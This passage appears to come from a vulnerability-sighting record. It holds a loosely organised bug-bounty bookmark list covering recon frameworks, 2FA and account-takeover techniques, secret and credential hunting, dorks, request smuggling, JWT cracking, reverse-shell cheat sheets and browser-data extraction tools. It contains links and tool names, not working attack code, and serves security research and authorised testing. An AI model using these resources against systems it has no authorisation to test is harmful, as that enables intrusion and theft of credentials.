https://vuls.cert.org/confluence/display/CVD/Sightings\n\n\nhttps://kathan19.gitbook.io/howtohunt/subdomain-takeover/easy_methods\nhttps://opensourcelibs.com/lib/google-acquisitions\n\n\n\nReverse shells\nhttps://github.com/wwkenwong/Pentest-note\n\nhttps://github.com/tehryanx?tab=repositories\nhttps://github.com/sawzeeyy/Sanitiz3r\nhttps://buaq.net/go-249.html\n\n\n\n s\n\n(https://github.com/Findomain/Findomain/releases)\n*   [Configuing Findomain](https://www.youtube.com/watch?v=Wpm2C1LD9ns)\n*   https://github.com/findomain/findomain/blob/master/README.md#subdomains-monitoring\n\n\nhttps://github.com/D35m0nd142/LFISuite\n\nhttps://hub.docker.com/u/secsi\ntips\n\n\n\n\nWig\nhttps://linuxsecurity.expert/tools/wig/\nxxxzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzx\u03a9xxxxxxxxxxx\u2248\u2248\nBlindElephant\nhttps://linuxsecurity.expert/tools/blindelephant/alternatives/\n\n\nhttps://ronak-9889.medium.com/denial-of-service-using-cookie-bombing-55c2d0ef808c\n\nIOT\n                https://www.youtube.com/watch?v=AKoyZLibIeo  ", "creation_timestamp": "2026-07-10T00:21:33.265312Z"}, {"uuid": "4d76600d-7a2a-4d3b-a764-b8c775a4ac40", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "9f56dd64-161d-43a6-b9c3-555944290a09", "vulnerability": "cve-2021-41773", "type": "seen", "source": "https://gist.github.com/morisono/425a7e299afea766050016d117b270da", "content": "                         \u2554\u2566\u2557\u2566 \u2566  \u2554\u2557 \u252c \u252c\u250c\u2500\u2510  \u2554\u2557 \u250c\u2500\u2510\u252c \u252c\u250c\u2510\u250c\u252c\u2510\u252c \u252c  \u2566\u2550\u2557\u250c\u2500\u2510\u250c\u2500\u2510\u250c\u2500\u2510\u252c \u252c\u252c\u2500\u2510\u250c\u2500\u2510\u250c\u2500\u2510\u250c\u2500\u2510\n                         \u2551\u2551\u2551\u255a\u2566\u255d  \u2560\u2569\u2557\u2502 \u2502\u2502 \u252c  \u2560\u2569\u2557\u2502 \u2502\u2502 \u2502\u2502\u2502\u2502\u2502 \u2514\u252c\u2518  \u2560\u2566\u255d\u251c\u2524 \u2514\u2500\u2510\u2502 \u2502\u2502 \u2502\u251c\u252c\u2518\u2502  \u251c\u2524 \u2514\u2500\u2510\n                         \u2569 \u2569 \u2569   \u255a\u2550\u255d\u2514\u2500\u2518\u2514\u2500\u2518  \u255a\u2550\u255d\u2514\u2500\u2518\u2514\u2500\u2518\u2518\u2514\u2518\u2534  \u2534   \u2569\u255a\u2550\u2514\u2500\u2518\u2514\u2500\u2518\u2514\u2500\u2518\u2514\u2500\u2518\u2534\u2514\u2500\u2514\u2500\u2518\u2514\u2500\u2518\u2514\u2500\u2518\n                                          \n                                           //\n                              ()==========&gt;&gt;======================================--\n                                           \\\\\n\n\n2FA Bypass\n  2fa bypass Mindmap https://www.mindmeister.com/1736437018?t=SEeZOmvt01 \n  2fa Bypass Methods https://workbook.securityboat.in/resources/web-app-pentest/business-logic-vulnerabilities/2fa-bypass\n\nAccount Takeovers\n  https://medium.com/@bathinivijaysimhareddy/tale-of-account-takeovers-part-2-9abf62de4ca3\n  https://kathan19.gitbook.io/howtohunt/subdomain-takeover/easy_methods\n\nAdminPanelFinder\n  \nadminphpfinder\nhttps://linux\nsecurity.expert/tools/admin-page-finder-php/\nAPI Security\n  https://www.cloudflare.com/learning/security/api/owasp-api-security-top-10/\n  Shadowe apis https://www.cloudflare.com/learning/access-management/what-is-shadow-it/\n  \nApi Keys\n  https://github.com/lanmaster53/recon-ng-marketplace/wiki/API-Keys\n\nAPI Hacking \nhttps://github.com/microsoft/restler-fuzzer\nhttps://github.com/hAPI-hacker/Hacking-APIs/fork\n\nAmass\n  https://securityweekly.com/wp-content/uploads/2021/05/AmassTechSegment-0.pdf\n\nAmass Scripting\\\nhttps://github.com/OWASP/Amass/tree/master/resources/scripts\nhttps://github.com/OWASP/Amass/blob/master/doc/scripting.md\namass scripting https://youtu.be/H1wdBgY1rtg?t=4987\n\n  Bug Bounty for Beginners Stream#4:AMASS, Subfinder, FFUF  https://www.youtube.com/watch?v=27zMfcr2fPE\n  https://hackbotone.com/blog/amass-osint-reconnaissance-tool/ \n  https://hakluke.medium.com/haklukes-guide-to-amass-how-to-use-amass-more-effectively-for-bug-bounties-7c37570b83f7\n  https://securityonline.info/amass-subdomain-enumeration/\n  https://github.com/OWASP/Amass/releases\n\nhttps://twitter.com/jeff_foley\n\nhttps://github.com/OWASP/Amass/blob/master/doc/scripting.md\nhttps://github.com/OWASP/Amass\nhttps://gist.github.com/sillydadddy/b1726c8e8ce281d55b82d4e2a1a610e8\nhttps://twitter.com/dokkillo/status/1305566849514471424\nhttps://github.com/PatrikFehrenbach/amass-tools/blob/master/assetfinder.ads\nhttps://github.com/OWASP/Amass#top-mentions\namass enum script command https://youtu.be/H1wdBgY1rtg?t=5408\nExample of api key configuration https://www.hahwul.com/2020/09/23/amass-go-deep-in-the-sea-with-free-apis/#chaos\n[31:33 / 1:56:06]\n[How to Use Amass Efficiently by @jeff_foley #NahamCon2020](https://youtu.be/H1wdBgY1rtg?t=1974)\n[OWASP AMass Boot Camp by Jeff Foley (Caffix)](https://www.youtube.com/watch?v=OOurkCPf2-I) \nAmass Tutorial https://github.com/OWASP/Amass/blob/master/doc/tutorial.md\nhttps://github.com/vortexau/dnsvalidator\nhttps://twitter.com/owaspamass\n\nAndroid\n  https://github.com/dzmitry-savitski/android-pentest-tool\n\nAngularJS\n  https://github.com/snoopysecurity/Public/blob/master/Old%20Presentations/MWRICON%202018/README.md\n  \nAuthentication Bypass Vulnerabilities\n\nAscii \n  https://github.com/heldersepu/hs-scripts/blob/master/ascii.txt\nAsset Monitoring  \n  https://github.com/ruevaughn/assetnote\n  https://github.com/yeswehack/pwn-machine\n  https://github.com/robre/jsmon\n\nAPI Hacking\n  https://github.com/Excloudx6/31-days-of-API-Security-Tips\n  https://gist.github.com/ruevaughn/51048bccdc753596443eca95cbf39356\n  https://apexvicky.medium.com/top-10-api-bugs-where-to-find-them-5dac338b3d73\n  https://attacker-codeninja.github.io/2021-08-28-Hacking-APIs-notes-from-bug-bounty-bootcamp/\n  https://dfir.blog/unfurl/\n  https://www.slideshare.net/programmableweb/why-api-security-is-more-complicated-than-you-think-and-why-its-your-1-priority\n  \nAmazon Cognito\nhttps://docs.aws.amazon.com/cognito-user-identity-pools/latest/APIReference/API_InitiateAuth.html\nhttps://docs.aws.amazon.com/cognito-user-identity-pools/latest/APIReference/CommonParameters.html\n  https://docs.aws.amazon.com/cognito/latest/developerguide/cognito-dg.pdf \n  https://docs.aws.amazon.com/cognito-user-identity-pools/latest/APIReference/API_GetUser.html\n  https://github.com/RhinoSecurityLabs/Security-Research/blob/master/tools/aws-pentest-tools/iam_user_enum/default-word-list.txt\n\nBlockchain\n  https://hash.ai/@b/uniswap\n  https://medium.com/immunefi/hacking-the-blockchain-an-ultimate-guide-4f34b33c6e8b\n  https://github.com/ruby/webrick/blob/master/lib/webrick/httprequest.rb }9\n  https://twitter.com/0xAsm0d3us/status/1438149310080712709 cdC\n\n\nBlogs\n  https://respectxss.blogspot.com/\n\nBrowsers\n  Save multiple pages as a single html page https://github.com/gildas-lormeau/SingleFile\n  https://bughacking.com/best-browsers-for-hackers/\n  https://hackaday.com/2022/01/17/hack-the-web-without-a-browser/\n  https://woob.tech/\n  https://github.com/moonD4rk/HackBrowserData\n  https://resources.infosecinstitute.com/topic/ethical-hacking-top-10-browser-extensions-for-hacking/\n  https://github.com/Excloudx6/browser-compat-data\n  https://httpwg.org/specs/rfc7230.html#header.transfer-encoding\n  https://developer.mozilla.org/en-US/docs/Glossary/Forbidden_header_name\n  https://developer.mozilla.org/en-US/docs/Web/HTTP/Headers/Content-Length\n  https://stackoverflow.com/questions/978061/http-get-with-request-body?rq=1\n  https://datatracker.ietf.org/doc/html/rfc7230\n  https://groups.yahoo.com/neo/groups/rest-discuss/conversations/messages/9962\n  https://www.ietf.org/rfc/rfc2119.txt\n  https://www.elastic.co/guide/en/elasticsearch/guide/current/_empty_search.html\n  https://www.concise-courses.com/hacking-tools/web-browser-related-tools/\n  \nEthereum Hacking\nhttps://github.com/NafisiAslH/KnowledgeSharing\nhttps://github.com/SecurityInnovation/Smart-Contract-CTF\n https://twitter.com/CyberWarship/sta tus/1533710785914056705\n https://github.com/heldersepu/hs-scripts/blob/master/NodeJS/web3/VestingERC20.js\n \nBroken Access Control - https://cwe.mitre.org/data/definitions/1345.html\nBusines Logic\nhttps://shahmeeramir.com/breaking-the-web-with-logics-ce22e8a9c4e2\nBrowser Extensions - Chrome\n  Collusion - https://chrome.google.com/webstore/search/collusion\n  DotGit - https://chrome.google.com/webstore/detail/dotgit/pampamgoihgcedonnphgehgondkhikel?hl=en\n  Trufflehog https://chrome.google.com/webstore/detail/trufflehog/bafhdnhjnlcdbjcdcnafhdcphhnfnhjc\n  Tracy - https://github.com/nccgroup/tracy/wiki/Example-Workflows\n  \nBrowser Extensions - Firefox\n  Cookie Editor - https://addons.mozilla.org/en-US/firefox/addon/cookie-editor/\n  Bulk URL Opener - https://addons.mozilla.org/en-GB/firefox/addon/bulkurlopener/\n  Hacktoolshttps://addons.mozilla.org/en-US/firefox/addon/hacktools/\n  Tracy https://github.com/nccgroup/tracy/wiki/Example-Workflows\n\nBug Bounty Programs\n  https://blog.bugzero.io/bug-zero-is-going-to-pay-your-security-bill-for-2022-4b6396e2ee48\n  Bulk Load Programs https://gist.github.com/brevityinmotion/b86f7475d4cd2790003326a4d3a528ba\n  Google Acquisitions   https://opensourcelibs.com/lib/google-acquisitions\n  https://github.com/The-Art-of-Hacking/h4cker/tree/master/bug-bounties#bug-bounty-platforms\n  Discovery Header DoD - https://github.com/KingOfBugbounty/Discovery-Header-Bug-Bounty\n  King Recon DoD - https://github.com/KingOfBugbounty/KingRecon_DOD\n  Bentley Bug Bounty Program - https://www.bentley.com/en/products\n  https://lostsoulofawolf.medium.com/bug-bounty-how-to-get-private-invites-60062a5d0809\n  https://github.com/Hack-with-Github\n  Shopify\n    https://www.hulkapps.com/\n  BBP (Bug Bounty Programs!)\n  https://github.com/Excloudx6/KingRecon_DOD\n  https://github.com/bughunterlabs/open-bounty-targets/blob/main/dorks.txt\n  https://jsfiddle.net/ruevaughn/2mnq5vgf/9/\n  https://github.com/detectify/cs-challenge\n  https://github.com/projectdiscovery/public-bugbounty-programs\n  https://app.intigriti.com/programs/redbull/redbull/detailhttps://gist.github.com/ruevaughn/a365c7100f8dce26e550e2e3e239e138\n  https://huntr.dev/\n  https://gist.github.com/ruevaughn/a365c7100f8dce26e550e2e3e239e138\n  https://support.google.com/websearch/answer/2466433?hl=en\n  Dutch Gov - bug bounty scope https://gist.github.com/ruevaughn/f2d1157598a6156c3d51538b3fbd980c\n  https://gist.github.com/haxcited/e684df7f9ec210867d25f7ccac22c1d5\n  https://github.com/B3nac/Android-Reports-and-Resources\n  https://hackerone.com/alipay?type=team\n  https://render.alipay.com/p/c/183ecyeztvuo/dana-pay.html\n  https://github.com/The-Art-of-Hacking/h4cker  \n  Disclosure Assistance w/ Hackerone https://hackerone.com/disclosure-assistance/disclosure_assistance_requests/new?type=team\n  Disclose.io - program List Data](https://raw.githubusercontent.com/disclose/diodb/master/program-list.json)\n  Open Bug Bounty - openbugbounty.com\n\nBurp Collaborator ALternatives\n  https://github.com/anshumanbh/terraform-burp-collaborator\nhttps://honoki.net/2021/07/11/wilson-cloud-respwnder/\n  https://github.com/honoki/wilson-cloud-respwnder\n  Interactsh\n    https://github.com/4ARMED/interactsh\nBlogs\n  https://www.veracode.com/blog?utm_source=lpFooter&amp;utm_medium=Website\n  http://10degres.net/posts/\n  https://www.secureideas.com/blog\n  \nBrute Forcing\n  Brutesubs\n    https://github.com/anshumanbh/brutesubs\n      https://github.com/anshumanbh/brutesubs/compare/master...exploitprotocol:brutesubs:master\n      https://github.com/APTreat/brutesubs\n      https://github.com/janmasarik/brutesubs\n      https://github.com/RyanLongVA/brutesubs\n     \nChaining Vulnerabilites\n   2022-style OAuth account takeover on Facebook - $45,000 bug bounty  https://www.youtube.com/watch?v=pk7oYuz4x0Q\n  \nCertificate Transparancy\nhttps://github.com/anshumanbh/terraform-burp-collaborator#using-a-proper-tls-certificate/\nhttps://www.rfc-editor.org/rfc/rfc5280#section-4.2.1.12\n   Attack Surface Management Series - EP1 - Certificate Transparency (In under 10 mins) - https://www.youtube.com/ watch?v=MGQ1GqmixY0\n\nCanaryTokens\nhttps://canarytokens.org/generate\n\nCerticiates\n  https://github.com/Echocipher/HackeroneSpider\nChecklists\n\nCheatsheet\nhttps://pentestmonkey.net/cheat-sheet/shells/reverse-shell-cheat-sheet\nhttps://github.com/dgtlmoon/changedetection.io\n#### CVE\n\nCode Review\nhttps://www.youtube.com/watch?v=q5NqY2RRLj0\nhttps://www.youtube.com/watch?v=bfLQjZmD5jY&amp;feature=youtu.be\n\nCookie \nCSRF Tokens\n  https://www.veracode.com/security/csrf-token\n  \nCors\n  csors https://chawdamrunal.medium.com/insecure-cors-configuration-808437d7cfd7\n  python cors_scan.py -u example.com -p http://127.0.0.1:8080 # To use socks5 proxy, install PySocks with pip install \n  https://jakearchibald.com/2021/cors/playground/\n  \nCSP https://www.keycdn.com/support/content-security-policy  \nhttps://www.bloggersideas.com/cspisawesome/\nhttps://content-security-policy.com/\n\nCourses \n  https://web.stanford.edu/class/cs253/\n  Nehamsec Udemy Course https://www.udemy.com/course/intro-to-bug-bounty-by-nahamsec/\n  \nCharacter Encodings\nhttps://stat545.com/character-encoding.html\n\nCharles Proxy\n  Use Charles Proxy to Reverse Engiener an IOS App https://www.youtube.com/watch?v=cvvPLlP4518&amp;feature=emb_logo\n\nChecklists \n  https://pentestbook.six2dez.com/others/web-checklist\n  https://github.com/zactly/handouts/blob/master/generic_checks.md\n  https://linuxsecurity.expert/checklists/\n  https://apexvicky.medium.com/bug-bounty-methodology-web-vulnerabilities-checklist-86175dd29987\n  https://github.com/zactly/handouts/blob/master/example_template.md\n  https://github.com/zactly/handouts/blob/master/conferences/locomocosec22/notes.md \n  https://github.com/AnLoMinus/Bug-Bounty/tree/main/Checklist/Web%20App\n  https://github.com/security-checklist/php-security-check-list\n  https://apexvicky.medium.com/bug-bounty-methodology-web-vulnerabilities-checklist-86175dd29987\n\nCheckout \n  https://0day.hu/\n\nCheatsheets\n  https://pentester.land/cheatsheets\n  https://pentester.land/cheatsheets/2019/03/25/compilation-of-recon-workflows.html\n  https://pentester.land/cheatsheets/2019/04/15/recon-resources.html\n  https://pentester.land/cheatsheets/2018/11/02/open-redirect-cheatsheet.html\n  \n  https://securityzines.com/#comics \n  https://github.com/EdOverflow/bugbounty-cheatsheet\n  https://m0chan.github.io/2019/12/17/Bug-Bounty-Cheetsheet.html\n  \nCloud Hacking \n  https://github.com/janmasarik/generate-bucketnames\n  https://github.com/janmasarik/GCPBucketBrute\n  https://github.com/avicoder/notes/tree/master/Cloud\n  https://github.com/avicoder/notes\n  Pwned Cloud Society pdf https://www.slideshare.net/BryceKunz/pwned-cloud-society-bsidesslc-2017?from_action=save\n  Cloud Hacking  https://www.youtube.com/watch?v=ITSZ8743MUk\n  https://www.cloudvulndb.org/\nhttps://github.com/jordanpotti/CloudScraper \nhttps://github.com/appsecco/spaces-finder\n\nCode Review\n  https://raw.githubusercontent.com/zactly/handouts/master/Practical%20Secure%20Code%20Review%20-%20Whitepaper.pdf\n\nCodeql\n\nCookies\n  https://datatracker.ietf.org/doc/html/rfc6265#section-5.3w\n  https://github.com/jshttp/cookie\n\nCryptography\n  http://www.math.sci.hiroshima-u.ac.jp/m-mat/MT/ARTICLES/earticles.html#sfmt\n\nCTFs\nhttps://github.com/SecurityInnovation/Smart-Contract-CTF\n  Stripe ctf https://gist.github.com/evandrix/1901352\n  \nCWE \n  CWE-548: Exposure of Information Through Directory Listing -  https://cwe.mitre.org/data/definitions/548.html\n\n  Default creds \n    https://github.com/Viralmaniar/Passhunt\nDirectory Listing\n  Konan branch ofDeepsearch  https://github.com/rkreddypandu/Konan\n  deepsearch https://github.com/prosecurity/DeepSearch\n  Dirb  https://techyrick.com/dirb/\n  http://www.tecapi.com/public/rvr-view-attack-vector-gui.jsp?antiCsrfToken=null&amp;attackVectorId=254 \n  http://projects.webappsec.org/w/page/13246922/Directory%20Indexing\n\nDjango \n  https://blog.sonarsource.com/disclosing-information-with-a-side-channel-in-django/?utm_source=twitter&amp;utm_medium=social&amp;utm_campaign=djangodictsort&amp;utm_content=security&amp;utm_term=mofu\n  \ndns Rebinding \n  https://bugs.chromium.org/p/project-zero/issues/detail?id=1524\n  https://portswigger.net/research/so-you-want-to-be-a-web-security-researcher#forgottenknowledge\n\nDorks\n  https://github.com/random-robbie/bugbountydork/fork\n  Aline - Dork Automator CLI - https://github.com/ferreiraklet/Aline\n  Brtwitter dork: https://mobile.twitter.com/i/events/1417062625997991936\n  https://www.infosecmatter.com/bug-bounty-tips-1/#5-top-25-open-redirect-dorks\n  Shifa123 BugBounty Dorks https://github.com/shifa123/bugbountyDorks/blob/master/bbdorks\n  Goop https://github.com/s0md3v/goop\n  Go-Dork \n    https://github.com/dwisiswant0/go-dork\n    https://github.com/dwisiswant0/go-dork/compare/master...babaloveyou:go-dork:master\n  https://bxmbn.medium.com/ultimate-tips-and-tricks-to-find-more-cross-site-scripting-vulnerabilities-d2913765e2d5\n  Open Bug Bounty Targets https://github.com/bughunterlabs/open-bounty-targets/blob/main/dorks.txt\n  uDork https://github.com/m3n0sd0n4ld/uDork\n  \nffuf\n  How to Ffuf https://www.bugcrowd.com/blog/how-to-ffuf-with-codingo/\n  How to use ffuf - Hacker Toolbox https://www.youtube.com/watch?v=aN3Nayvd7FU\n  Fuzzing / FFUF -&gt; 5-30-22 Nehamssec stream covered fuzzing A LOT https://www.twitch.tv/videos/1312499916\n  Protips ffuf - tips and tricks https://www.youtube.com/watch?v=uwcRBSUl8e4&amp;t=358s\n  Late to the party, or, in other words massive web enumeration using ffuf. http://0entropy.blogspot.com/2020/05/late-to-party-or-in-other-words-massive.html\n  https://gowthams.gitbook.io/bughunter-handbook/fuzzing-fuff\n  https://0xmahmoudjo0.medium.com/how-i-found-multiple-sql-injection-with-ffuf-and-sqlmap-in-a-few-minutes-9c3bb3780e8f\n \n Fingerprinting\n   Fingerpint JS https://github.com/fingerprintjs/fingerprintjs\n   Whatweb\n   Wappalyze\n   Webanalyze\n   \nFrameworks\n  axiom \n    https://github.com/pry0cc/axiom\n    https://github.com/pry0cc/axiom/blob/master/images/provisioners/default.json\n  BBRF Client - https://github.com/honoki/bbrf-client\n  BugBounty Toolkit - Hackersploit Framework - https://github.com/AlexisAhmed/BugBountyToolkit\n  Findomain https://github.com/Findomain/Findomain\n  Hive https://hexway.io/blog/new-update-hive/\n  Intrigue \n    https://core.intrigue.io/\n    https://core.intrigue.io/getting-started/\n  LazyRecon - https://github.com/nahamsec/lazyrecon\n  Mandiant - Web GUI Take decisive action with industry-leading intelligence  https://www.mandiant.com\n  MooseDojo - apt2 - Pentesters Framework nmap centered \n    apt2 https://buaq.net/go-249.html  \n    apt2 MooseDojo/apt2: automated penetration toolkit   \n\n  Nerve \n    https://github.com/PaytmLabs/nerve\n  Osmedeus \n    https://docs.osmedeus.org/workflow/default-workflow/\n    https://github.com/j3ssie/osmedeus \n    https://xploitlab.com/osmedeus-the-most-complete-reconnaissance-tool-and-vulnerability-scanning/\n    https://docs.osmedeus.org/web-ui/ \n    https://github.com/osmedeus/osmedeus-workflow/blob/main/general/subdomain.yaml \n    https://discord.com/invite/mtQG2FQsYA \n    https://docs.osmedeus.org/installation/practical-usage\n    https://docs.osmedeus.org/workflow/\n  Pwn Machine https://github.com/yeswehack/pwn-machine  \n  \n  ReconFTW - https://github.com/six2dez/reconftw\n  Recon NG\n    https://github.com/anshumanbh/domain\n    https://raw.githubusercontent.com/anshumanbh/domain/master/enumall.py\n    Github https://github.com/lanmaster53/recon-ng \n    Welcome to the Recon-ng Marketplace https://github.com/lanmaster53/recon-ng-marketplace\n    API Key list   https://github.com/lanmaster53/recon-ng-marketplace/wiki/API-Keys\n    Setup script for Regon-ng  and altdns https://github.com/jhaddix/domain\n  Reconness - https://github.com/reconness/reconness\n  Rengine - \n    https://github.com/yogeshojha/rengine\n    https://github.com/yogeshojha/rengine/commit/cf30e98e0440424019cb2cad600892ce405f850e\n    Default Config Engine Yaml file https://raw.githubusercontent.com/yogeshojha/rengine/master/default_yaml_config.yaml\n  Sniper - https://github.com/1N3/Sn1per\n  TIDoS Framework https://github.com/0xInfection/TIDoS-Framework\n  Trickest https://www.youtube.com/watch?v=fXwWinE0sSg\n  Vajra - https://github.com/r3curs1v3-pr0xy/vajra\n  WebhackerWeapons https://github.com/hahwul/WebHackersWeapons\n\nFreq\n  Removes unnecesary output and only outputs happy (for us) path https://github.com/takshal/freq/compare/main...dmonteirosouza:freq:main\n  Fork by Realgoose. Adds a User-Agent bxss as well as robots.txt sprayer check https://github.com/takshal/freq/compare/main...RealGoose:freq:main\n  Removed unnecesary output https://github.com/takshal/freq/compare/main...dmonteirosouza:freq:main\n  Fork by kg11102 KaioGomes. Adds User-Agent firefox and Referrer Header check. Changes alert check. Ignored expired SSL Cert (Probably to skip errors) https://github.com/takshal/freq/compare/main...kg1102:freq:main\n  \n  \nGatsby\nhttps://www.gatsbyjs.com/docs/conceptual/security-in-gatsby/#key-security\nhttps://www.gatsbyjs.com/blog/2019-04-06-security-for-modern-web-frameworks/\n\nGit/Source Code Secret Finding\nhttps://github.com/auth0/repo-supervisor\nhttps://blog.gitleaks.io/finding-secrets-with-regular-expressions-d90493bb3784\n  https://docs.github.com/en/code-security/secret-scanning/about-secret-scanning \n  https://github.com/takshal/Git-Finder \n  https://tillsongalloway.com/finding-sensitive-information-on-github/\n  https://secapps.com/tutorials/github-gist-recon\n  http://10degres.net/github-tools-collection/\n  https:// docs.github.com/en/rest/search\n  git-all-secrets\n    https://github.com/mhmdiaa/git-all-secrets\n    https://github.com/anshumanbh/git-all-secrets\n  https://www.ndss-symposium.org/wp-content/uploads/2019/02/ndss2019_04B-3_Meli_paper.pdf\n  https://github.com/koto/gitpillage\n  https://github.com/hisxo/gitGraber\n  https://github.com/gwen001/github-search\n  https://github.com/darkseed/gitpillage\n  Tools to Get sensitive info / secrets from https://twitter.com/soaj1664ashar/status/1176769454035939328\n  https://github.com/trufflesecurity/trufflehog\n  Why Exposed API Keys and Sensitive Data are Growing Cause for Concern https://www.programmableweb.com/news/why-exposed-api-keys-and-sensitive-data-are-growing-cause-concern/analysis/2015/01/05\n  Secret Hunting - Google Dorks, Git Dorks, Employee OSINT, etc\n  https://gist.github.com/markofu/549fbd287edf08c38e869dacc740e49de\n  https://github.com/aquasecurity/cloudsploit  \n  Trufflehog https://www.youtube.com/watch?v=aioheMi1Wko\n  https://sapt.medium.com/perform-information-gathering-using-following-tools-on-the-given-targets-cyber-sapiens-internship-12c858166008\n  +Github Wiki Auditor https://www.smeegesec.com/2019/03/auditing-github-repo-wikis-for-fun-and.html\n  https://github.com/SmeegeSec/GitHub-Wiki-Auditor \n  https://www.kitploit.com/2022/04/gitbleedtools-for-extracting-data-from.html\n  https://github.com/phlmox/jslinkfinderv2\n  https://exposingtheinvisible.org/guides/google-dorking/ &lt;---- huge dorking guide!\n  https://github.com/phlmox/bingdork\n  \n  Git-Secrets\n   Adds supports for scanning aws, gcp, ads a gf regex pattern,   https://github.com/awslabs/git-secrets/compare/master...deshpandetanmay:git-secrets:master\n  Adds support for scaning entire drive, concept of install.uninstall, a global config file and a regex patterns file (nice!) https://github.com/awslabs/git-secrets/compare/master...dbrs:git-secrets:master\n  He adds one pattern to replace all the previous ones, and it adds a curl request. Other various changes. https://github.com/awslabs/git-secrets/compare/master...konakonall:git-secrets:master\n  \n  \n  https://github.com/toniblyx/my-arsenal-of-aws-security-tools\n  https://techvomit.net/aws-security/\n  https://github.com/gwen001/s3-bucketsdfinder.git\n  https://github.com/janmasarik/bucketsperm\n  https://github.com/phlmox/gdork\n  https://github.com/lc/secretz\n   https://github.com/kevthehermit/PasteHunter\n\ngitdump (TODO Take Notes and Implement from John Hammon Stream)\nhttps://github.com/topics/crawl?o=desc&amp;s=updated\n\nGraphql\n  https://github.com/IvanGoncharov/graphql-voyager\n  https://github.com/Escape-Technologies/graphinder\n  https://github.com/gsmith257-cyber/GraphCrawler\n  Learn Graphql https://www.gatsbyjs.com/docs/conceptual/graphql-concepts/\n  That single GraphQL issue that you keep missing https://blog.doyensec.com/2021/05/20/graphql-csrf.html\n  https://blog.assetnote.io/2021/08/29/exploiting-graphql/\n  https://twitter.com/holybugx/status/1441460070387261440?s=21\n  https://github.com/swisskyrepo/PayloadsAllTheThings/tree/master/GraphQL%20Injection\n  https://www.programmableweb.com/news/what-graphql-and-how-did-it-evolve-rest-and-other-api-technologies/analysis/2019/07/31\n  https://github.com/KathanP19/HowToHunt/blob/master/GraphQL/GraphQL.md\n  https://swizec.com/blog/reverse-engineer-a-graphql-api-to-automate-love-notes-codewithswiz-24/\n  https://www.youtube.com/watch?v=cvvPLlP4518&amp;feature=emb_logo\n  Graphwoof https://github.com/dolevf/graphw00f\n  Graphql Voyager https://ivangoncharov.github.io/graphql-voyager/\n  inQL graphql Burp Extension for burp [here](https://youtu.be/5qSq1S2sRC8?t=753)\n  \nGithubs \n    https://github.com/bbhunter\n\nHandson / Demos\nhttps://github.com/yandex/securitygym\n  aws test challenge http://flaws.cloud/\n  ABUH! https://darkrebel.net/metarget-framework-providing-automatic-consctions-of-vulnerable-infrastructures | metarget appv install dvwa | metarget install  cve-2021-2312\n  xss jigsaw - https://blog.innerht.ml/page/2/\n  https://google-gruyere.appspot.com/\n  https://hackxor.net/\n  https://github.com/takshal/FOR-FUN\n  Vulnrable Task Manger app https://github.com/redpointsec/vtm\nHacking Tools\n  https://reqbin.com\n  https://gist.github.com/bgoonz/524b4ea887b216b810d16429265a34a3\nHTTP\n  HTTP Pipelining in burp https://youtu.be/boHIjDHGmIo?t=204)\n\nHTTP Parameer Pollution \n  HPP  https://www.youtube.com/watch?v=QVZBl8yxVX0&amp;t=13s\n  \nHTTP Request Smuggling\n\nHTTP Security Headers https://blog.detectify.com/2019/02/05/guide-http-security-headers-for-better-web-browser-security/\nHTTP HEader Smuggling https://github.security.telekom.com/2020/05/smuggling-http-headers-through-reverse-proxies.html\nhttp headers  https://www.ibm.com/docs/en/ibm-mq/7.5?topic=headers-content-type-http-entity-header\n   \nRequest Smuggling\nhttps://github.com/ruevaughn/websocket-connection-smuggler\nhttps://portswigger.net/daily-swig/how-to-perform-an-http-header-smuggling-attack-through-a-reverse-proxy\nhttps://twitter.com/albinowax/status/1263122811683553283\nNote: kitploit guys is the hackbogtone guy\nhttps://www.kitploit.com/2021/08/http-request-smuggling-http-request.html\nhttps://hackbotone.com/blog/http-request-smuggling-detection-tool/\nhttps://www.youtube.com/watch?v=mijOcGLneLU&amp;t=303.658823s\n  Defparam Variant      - https://gist.github.com/defparam/840f7d9e31f77b3c5460c5921e0787ef/revisions\n  bbhunter mutations    - https://gist.github.com/bbhunter\n HTTP Request Smuggling - https://gist.github.com/ruevaughn/9c76260b412446f33b647c970bbb1001)\n\nHTTP Request Smuggling Tools\n  https://github.com/Sh1Yo/request_smuggler\n  \nIDOR\n  https://medium.com/pentesternepal/access-control-worth-2000-everyone-missed-this-idor-access-control-between-two-admins-9745eaf15d21\n  \nISS=\n\niis https://www.rapid7.com/db/vulnerabilities/spider-asp-dot-net-trace-axd/\n\n\nIos\n  https://medium.com/pentesternepal/access-control-worth-2000-everyone-missed-this-idor-access-control-between-two-admins-9745eaf15d21\n  https://havoc.app/package/crane\n  \n\nInsecure Deserialisation\nInsecure Deserialisation https://www.youtube.com/watch?v=SNi7gNkfLSM\n\nIP (INternet Protocol) https://youtu.be/C7CpfL1p6y0?t=320 \n                        \n\nJavascript\n  \ud83d\udd75\ufe0f Pinkerton is an JavaScript file crawler and secret finder developed in Python  https://github.com/oppsec/Pinkerton\n  Looking through javascript files live hacking https://youtu.be/xx5fF7i-dCQ?t=2582\n  https://www.bugbountyhunter.com/guides/?type=javascript_files\n  JAVASCRIPTRECON.md https://gist.github.com/m4ll0k/31ce0505270e0a022410a50c8b6311ff\n  https://portswigger.net/research/dom-based-angularjs-sandbox-escapes\n  Javascript for hackers https://www.youtube.com/watch?v=FTeE3OrTNoA\n  https://legallybreaking.com/discussion/88/full-featured-javascript-recon-automation-jsfscan-sh\n  https://labs.detectify.com/2016/12/08/the-pitfalls-of-postmessage/  \n  Javascript Enumeration https://www.youtube.com/watch?v=IsSWbVHk11M\n  https://cheatsheetseries.owasp.org/cheatsheets/Third_Party_Javascript_Management_Cheat_Sheet.html\n  unminifier http://dean.edwards.name/my/\n\n\n  https://github.com/robre/scripthunter\n\nJSON Attacks - JSON https://www.youtube.com/watch?v=oUAeWhW5b8c\n\nJWT\n  https://gist.github.com/ruevaughn/328067fadf926ddb788f98cd0d2d1a71 Crack JWT\n  https://medium.com/redteam/stealing-jwts-in-localstorage-via-xss-6048d91378a0\n  Security Weekly Unlocked: https://www.youtube.com/playlist?list=PLlPkFwQHxYE7nQtKNzjnsVyoSOu2K4l9e\n  https://anil-pace.medium.com/json-web-tokens-vs-oauth-2-0-85dd0b32057d\n  https://www.youtube.com/watch?v=muYmiEtPL8U JWT with bbking\n  JWT Traversal https://github.com/MoisesTapia/JwtTransversal\n\nMd5 \n  https://github.com/juuso/BozoCrack\n  \nMeg\n  